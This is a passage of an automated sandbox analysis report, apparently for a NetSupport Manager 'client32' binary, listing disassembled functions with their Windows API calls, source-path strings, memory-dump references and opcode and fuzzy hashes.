                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                    • API String ID: 2229609774-2830328467
                                                                                                                                    • Opcode ID: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                                                                    • Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
                                                                                                                                    • Opcode Fuzzy Hash: 41ac2f8117c1c669daa6b7824a22dc0040faad1d84520ef1f3ec06ac7ff731c9
                                                                                                                                    • Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1100D5E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
                                                                                                                                    • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CB7A,?), ref: 1100D5F8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LibraryLoadVersion
                                                                                                                                    • String ID: AudioCapture.dll
                                                                                                                                    • API String ID: 3209957514-2642820777
                                                                                                                                    • Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                                                                    • Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
                                                                                                                                    • Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                                                                    • Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(00000000,00001200,00000000,00000000), ref: 1101419A
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11014180
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101417B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3507600817
                                                                                                                                    • Opcode ID: dd98e714131f01e1e3e9502ddc8d4ea3022c80635d59d6fdd5c37ba5f3223207
                                                                                                                                    • Instruction ID: 2522c449d059071d808e86b76c7b4b43721457dd443dfec71d59ac38f3b9efb9
                                                                                                                                    • Opcode Fuzzy Hash: dd98e714131f01e1e3e9502ddc8d4ea3022c80635d59d6fdd5c37ba5f3223207
                                                                                                                                    • Instruction Fuzzy Hash: A0D0A735F9033576E6205591AC4BFC5B2985B04B49F104165F121B90C1D2A0B4408648
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014960 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(00000000,00001032,00000000,00000000), ref: 1101498D
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11014973
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 1101496E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: 99e756a3a64ec9ed9c9c8981f78799417f19046fec714046585ec63228c663e2
                                                                                                                                    • Instruction ID: a4fb90f55706e6eaef0c83aa107f5fd66a08e3236ee74b2d3831c90f3092421f
                                                                                                                                    • Opcode Fuzzy Hash: 99e756a3a64ec9ed9c9c8981f78799417f19046fec714046585ec63228c663e2
                                                                                                                                    • Instruction Fuzzy Hash: 22D0A775E903667BE6309595EC47FC5F2885B05704F018465F165790C0D2E0B4808684
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11014820 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 1101484D
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hWnd, xrefs: 11014833
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 1101482E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$ErrorExitLastProcessSendwsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
                                                                                                                                    • API String ID: 819365019-3966830984
                                                                                                                                    • Opcode ID: 8ac94b95f1832676c15134108c47446b33aa87dd6cfd329ef2cf2b7629d3235a
                                                                                                                                    • Instruction ID: 0da0c99d66379cc79c0dfa12855c83416e1e6f8243e474cfdbd33265e4c08c7f
                                                                                                                                    • Opcode Fuzzy Hash: 8ac94b95f1832676c15134108c47446b33aa87dd6cfd329ef2cf2b7629d3235a
                                                                                                                                    • Instruction Fuzzy Hash: 66D0A775E40366B7E6309591AC47FC6B2845B05718F004475F369BA4C0E2E0B4808658
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 11113160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindWindowA.USER32 ref: 1111316A
                                                                                                                                    • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11113180
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FindMessageSendWindow
                                                                                                                                    • String ID: MSOfficeWClass
                                                                                                                                    • API String ID: 1741975844-970895155
                                                                                                                                    • Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                                                    • Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
                                                                                                                                    • Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                                                    • Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1115F310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                                                                                    • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                                                                    • API String ID: 1417657345-2201682149
                                                                                                                                    • Opcode ID: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                                                                    • Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
                                                                                                                                    • Opcode Fuzzy Hash: 040279418c787453246ac35a00e20d52c99efbdfef44f19d6389bd7086f83bc2
                                                                                                                                    • Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 110161B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • ImageList_GetImageCount.COMCTL32 ref: 110161CF
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    • m_hImageList, xrefs: 110161BF
                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h, xrefs: 110161BA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Image$CountErrorExitLastList_MessageProcesswsprintf
                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\imagelst.h$m_hImageList
                                                                                                                                    • API String ID: 3979668856-4007669474
                                                                                                                                    • Opcode ID: 7e0d59d6d3c0ea1f021620d87c473adee649be5d7cc0ac9c58f617f8560ff774
                                                                                                                                    • Instruction ID: da6b7ee7688318b2dcaecae8c32772a12d0a8ac3ffe856306cb0240b92e991ba
                                                                                                                                    • Opcode Fuzzy Hash: 7e0d59d6d3c0ea1f021620d87c473adee649be5d7cc0ac9c58f617f8560ff774
                                                                                                                                    • Instruction Fuzzy Hash: 99D02230E40136ABC3209A94BC02BC9B3886F05208F0C0465F06256040E6B468808A84
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 111100D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001129E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112AD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000112DF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001132B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_16_2_11000000_client32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorEventExitLastMessageProcesswsprintf
                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$this->hReadyEvent
                                                                                                                                    • API String ID: 2400454052-4183089485
                                                                                                                                    • Opcode ID: 4b22ea46bdd503ae8f9c5b08486a64ba336daf28115d2eb9ea5a5faf497afeb0
                                                                                                                                    • Instruction ID: 41d86d8e6b2fa9399a940e20fae9938a479a885d6893b5e9ee770bdda361f714
                                                                                                                                    • Opcode Fuzzy Hash: 4b22ea46bdd503ae8f9c5b08486a64ba336daf28115d2eb9ea5a5faf497afeb0
                                                                                                                                    • Instruction Fuzzy Hash: D4D01231E80736AFD7209AE5AC05BD6F3B85B04315F044539F012A6584DAB0A4458BE5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1100D8B0 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(111EDE2C,00000000,?,?,1100C26B,00000000,00000000), ref: 1100D8BF
                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EDE2C,?,?,1100C26B,00000000,00000000), ref: 1100D930
                                                                                                                                      • Part of subcall function 1100D820: EnterCriticalSection.KERNEL32(111EDE2C,1100CB7A,?,1100B5DC,?,00000000,?,1100CB7A,?), ref: 1100D829
                                                                                                                                      • Part of subcall function 1100D820: LeaveCriticalSection.KERNEL32(111EDE2C,1100B5DC,?,00000000,?,1100CB7A,?), ref: 1100D8A1
                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EDE2C), ref: 1100D8FF
                                                                                                                                    • LeaveCriticalSection.KERNEL32(111EDE2C), ref: 1100D91B
                                                                                                                                      • Part of subcall function 1100D7D0: EnterCriticalSection.KERNEL32(111EDE2C,1100C4FB), ref: 1100D7D5
                                                                                                                                      • Part of subcall function 1100D7D0: LeaveCriticalSection.KERNEL32(111EDE2C), ref: 1100D80F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000010.00000002.655489981.0000000011001000.00000020.00000001.01000000.00000005.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                    • Associated: 00000010.00000002.655474358.0000000011000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656403124.00000000111F1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.00000000111F7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.000000001125D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                    • Associated: 00000010.00000002.656419885.0000000011288000.00000002.00000001.01000000.00000005.sdmpDownload File
